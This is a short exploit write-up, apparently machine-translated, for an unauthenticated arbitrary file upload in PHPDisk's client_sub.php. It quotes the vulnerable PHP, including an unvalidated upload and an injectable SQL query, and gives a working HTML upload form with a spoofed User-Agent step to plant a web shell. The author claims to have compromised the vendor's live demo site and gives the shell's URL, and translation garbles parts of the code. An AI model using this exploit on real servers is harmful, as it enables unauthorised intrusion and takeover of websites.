Arbitrary phpdisk File Upload getshell (shell on official website)

You do not need to log on or use getshell. The upload location is in plugins/phpdisk_client/client_sub.php. First, the user-agent is verified, and a username and password include "is obtained from the decryption string ".. /.. /shortdes/commons. inc. php ";

@ Set_time_limit (0); $ agent =$ _ SERVER ['HTTP _ USER_AGENT ']; if ($ agent! = 'Phpdisk-client') {exit ('<a href = "http://faq.phpdisk.com/search? W = p403 & err = code "target =" _ blank "> [PHPDisk Access Deny] Invalid Entry! </A> ') ;}$ u_info = trim (gpc ('U _ info', 'P', ''); parse_str (pd_encode (base64_decode ($ u_info ), 'decode'); // checked username and pwd... /* $ username = trim (gpc ('username', 'gp ', ''); $ password = trim (gpc ('Password', 'gp ', ''); */$ username = is_utf8 ()? $ Username: convert_str ('utf-8', 'gbk', $ username); $ password = is_utf8 ()? $ Password: convert_str ('utf-8', 'gbk', $ password ); $ userinfo = $ db-> fetch_one_array ("select userid from {$ tpf} users where username = '$ username' and password =' $ password'"); if (! $ Userinfo) {$ str = 'network disk logon error: incorrect user name or password. Enter '; $ str = is_utf8 ()? Convert_str ('utf-8', 'gbk', $ str): $ str; echo $ str;} else {$ uid = (int) $ userinfo [userid];}

After obtaining the user name and password, go to the database for query, but after the query error, echo "online disk logon error: the user name or password is incorrect. Please enter it again" and did not exit. This is useless. You do not need to know the encrypted string or log on. So let's continue,

switch ($action){case 'upload_file'://write_file(PHPDISK_ROOT.'system/2.txt',var_export($_POST,true));//write_file(PHPDISK_ROOT.'system/3.txt',var_export($_FILES,true));$file = $_FILES['file1'];$file_name = trim(gpc('file_name','P',''));$file_do_name = trim(gpc('file_do_name','P',''));$file_local_path = trim(gpc('file_local_path','P',''));$folder_id = (int)gpc('folder_id','P',0);$file_size = (int)gpc('file_size','P',0);$file_parts = (int)gpc('file_parts','P',0);$tmp_dir = PHPDISK_ROOT.'system/cache/';make_dir($tmp_dir);$file_local_path = is_utf8() ? convert_str('gbk','utf-8',$file_local_path) : $file_local_path;$file_do_name = is_utf8() ? convert_str('gbk','utf-8',$file_do_name) : $file_do_name;$file_name = is_utf8() ? convert_str('gbk','utf-8',$file_name) : $file_name;if(upload_file($file['tmp_name'],$tmp_dir.$file[name])){//insert db

 

Call upload_file to upload the file after entering the case. The $ file [name] is used directly for the file name. Let's take a look at upload_file:

function upload_file($source, $target) {if (function_exists('move_uploaded_file') && @move_uploaded_file($source, $target)) {@chmod($target, 0666);return $target;} elseif (@copy($source, $target)) {@chmod($target, 0666);return $target;} elseif (@is_readable($source)) {if ($fp = @fopen($source,'rb')) {@flock($fp,2);$filedata = @fread($fp,@filesize($source));@fclose($fp);}if ($fp = @fopen($target, 'wb')) {@flock($fp, 2);@fwrite($fp, $filedata);@fclose($fp);@chmod ($target, 0666);return $target;} else {return false;}}}

 

No verification. Directly copied. Although there is an unlink next to the case block to delete the uploaded file, the unlink is not executed due to a database query failure. (It should be, I did not take a closer look, I did not execute it anyway, and my shell was not deleted.) Use: Create an upload page locally:

<Form name = "form" method = "post" action = "http://demo.phpdisk.com/v/plugins/phpdisk_client/client_sub.php? Action = file_upload "enctype =" multipart/form-data "> <input type =" hidden "name =" file_name "value =" aaa.gif "> <input type =" file "name = "file1"> <input type = "submit" name = "Submit" value = "Upload"> </form>

 

Select shell upload to capture packets. Change the user-agent to "phpdisk-client. Send. The returned package is like this: Check/system/cache/To see the shell:
Official site demo site shell has won: http://demo.phpdisk.com/v/system/cache/info.php